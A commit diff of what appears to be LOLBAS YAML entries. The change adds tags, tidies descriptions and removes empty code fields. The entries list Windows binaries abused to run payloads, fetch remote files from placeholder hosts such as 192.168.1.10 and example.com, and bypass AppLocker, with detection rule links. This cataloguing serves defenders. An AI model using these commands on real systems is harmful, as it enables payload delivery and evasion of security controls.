- Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
Description: Launch an executable by calling the RegisterOCX function. Description: Launch an executable by calling the RegisterOCX function.
Usecase: Run an executable payload. Usecase: Run an executable payload.

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: c:\windows\system32\scrobj.dll - Path: c:\windows\system32\scrobj.dll
- Path: c:\windows\syswow64\scrobj.dll - Path: c:\windows\syswow64\scrobj.dll

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Input: INF
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf
Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
Usecase: Load an executable payload. Usecase: Load an executable payload.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Input: INF
Full_Path: Full_Path:
- Path: c:\windows\system32\setupapi.dll - Path: c:\windows\system32\setupapi.dll
- Path: c:\windows\syswow64\setupapi.dll - Path: c:\windows\syswow64\setupapi.dll

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
Description: Launch an executable by calling the ShellExec_RunDLL function. Description: Launch an executable by calling the ShellExec_RunDLL function.
Usecase: Run an executable payload. Usecase: Run an executable payload.

View File

@ -5,12 +5,14 @@ Author: Eral4m
Created: 2021-01-06 Created: 2021-01-06
Commands: Commands:
- Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe - Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe
Description: Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<random>\payload[1].exe. Can also be used with entrypoint 'ImageView_FullscreenA'. Description: Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'.
Usecase: Download file from remote location. Usecase: Download file from remote location.
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: c:\windows\system32\shimgvw.dll - Path: c:\windows\system32\shimgvw.dll
- Path: c:\windows\syswow64\shimgvw.dll - Path: c:\windows\syswow64\shimgvw.dll

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Input: INF
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
Usecase: Load an executable payload. Usecase: Load an executable payload.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Input: INF
Full_Path: Full_Path:
- Path: c:\windows\system32\syssetup.dll - Path: c:\windows\system32\syssetup.dll
- Path: c:\windows\syswow64\syssetup.dll - Path: c:\windows\syswow64\syssetup.dll

View File

@ -21,8 +21,6 @@ Commands:
Full_Path: Full_Path:
- Path: c:\windows\system32\zipfldr.dll - Path: c:\windows\system32\zipfldr.dll
- Path: c:\windows\syswow64\zipfldr.dll - Path: c:\windows\syswow64\zipfldr.dll
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
Resources: Resources:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
Code_Sample: Code_Sample:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1216 MitreID: T1216
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
Code_Sample: Code_Sample:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: DLL
- Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
Usecase: Local execution of managed code to bypass AppLocker. Usecase: Local execution of managed code to bypass AppLocker.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe

View File

@ -28,8 +28,6 @@ Commands:
Full_Path: Full_Path:
- Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
- Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml
Resources: Resources:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: bginfo.exe bginfo.bgi /popup /nolicprompt - Command: bginfo.exe bginfo.bgi /popup /nolicprompt
Description: Execute VBscript code that is referenced within the bginfo.bgi file. Description: Execute VBscript code that is referenced within the bginfo.bgi file.
Usecase: Local execution of VBScript Usecase: Local execution of VBScript
@ -18,12 +20,16 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript Usecase: Remote execution of VBScript
Description: Execute bginfo.exe from a WebDAV server. Description: Execute bginfo.exe from a WebDAV server.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
Tags:
- Execute: WSH
OperatingSystem: Windows OperatingSystem: Windows
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript Usecase: Remote execution of VBScript
@ -32,6 +38,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch. Description: This style of execution may not longer work due to patch.
@ -39,6 +47,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
Usecase: Remote execution of VBScript Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch. Description: This style of execution may not longer work due to patch.
@ -46,10 +56,10 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: WSH
Full_Path: Full_Path:
- Path: No fixed path - Path: No fixed path
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1055 MitreID: T1055
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: DLL
- Command: coregen.exe dummy_assembly_name - Command: coregen.exe dummy_assembly_name
Description: Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0). Description: Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0).
Usecase: Execute DLL code Usecase: Execute DLL code
@ -25,6 +27,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe - Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe
- Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe - Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
@ -42,8 +46,5 @@ Resources:
- Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html - Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
Acknowledgement: Acknowledgement:
- Person: Nicky Tyrer - Person: Nicky Tyrer
Handle:
- Person: Evan Pena - Person: Evan Pena
Handle:
- Person: Casey Erikson - Person: Casey Erikson
Handle:

View File

@ -6,11 +6,13 @@ Created: 2019-07-19
Commands: Commands:
- Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll - Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Description: Downloads payload from remote server Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder Usecase: It will download a remote payload and place it in INetCache.
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe

View File

@ -6,11 +6,13 @@ Created: 2022-07-24
Commands: Commands:
- Command: MsoHtmEd.exe https://example.com/payload - Command: MsoHtmEd.exe https://example.com/payload
Description: Downloads payload from remote server Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) Usecase: It will download a remote payload and place it in INetCache.
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe

View File

@ -6,11 +6,13 @@ Created: 2022-08-02
Commands: Commands:
- Command: mspub.exe https://example.com/payload - Command: mspub.exe https://example.com/payload
Description: Downloads payload from remote server Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) Usecase: It will download a remote payload and place it in INetCache.
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe

View File

@ -6,11 +6,13 @@ Created: 2019-07-19
Commands: Commands:
- Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll" - Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Description: Downloads payload from remote server Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder Usecase: It will download a remote payload and place it in INetCache.
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe

View File

@ -12,14 +12,18 @@ Commands:
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher
Tags:
- Execute: DLL
- Command: procdump.exe -md calc.dll foobar - Command: procdump.exe -md calc.dll foobar
Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
Usecase: Performs execution of unsigned DLL. Usecase: Performs execution of unsigned DLL.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: no default - Path: no default
Detection: Detection:

View File

@ -18,6 +18,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: DLL
- Input: Custom Format
Full_Path: Full_Path:
- Path: no default - Path: no default
Detection: Detection:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: DLL
- Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
Usecase: Injection of locally stored DLL file into target process. Usecase: Injection of locally stored DLL file into target process.
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: no default - Path: no default
Code_Sample: Code_Sample:

View File

@ -6,11 +6,13 @@ Created: 2019-07-19
Commands: Commands:
- Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll" - Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Description: Downloads payload from remote server Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder Usecase: It will download a remote payload and place it in INetCache.
Category: Download Category: Download
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows OperatingSystem: Windows
Tags:
- Download: INetCache
Full_Path: Full_Path:
- Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe - Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe
@ -28,8 +30,6 @@ Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe - Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe
- Path: C:\Program Files\Microsoft Office\Office12\winword.exe - Path: C:\Program Files\Microsoft Office\Office12\winword.exe
- Path: C:\Program Files\Microsoft Office\Office12\winword.exe - Path: C:\Program Files\Microsoft Office\Office12\winword.exe
Code_Sample:
- Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml
- IOC: Suspicious Office application Internet/network traffic - IOC: Suspicious Office application Internet/network traffic

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed) OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed)
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe
Detection: Detection:

View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2022\TestAgent\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\2022\TestAgent\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe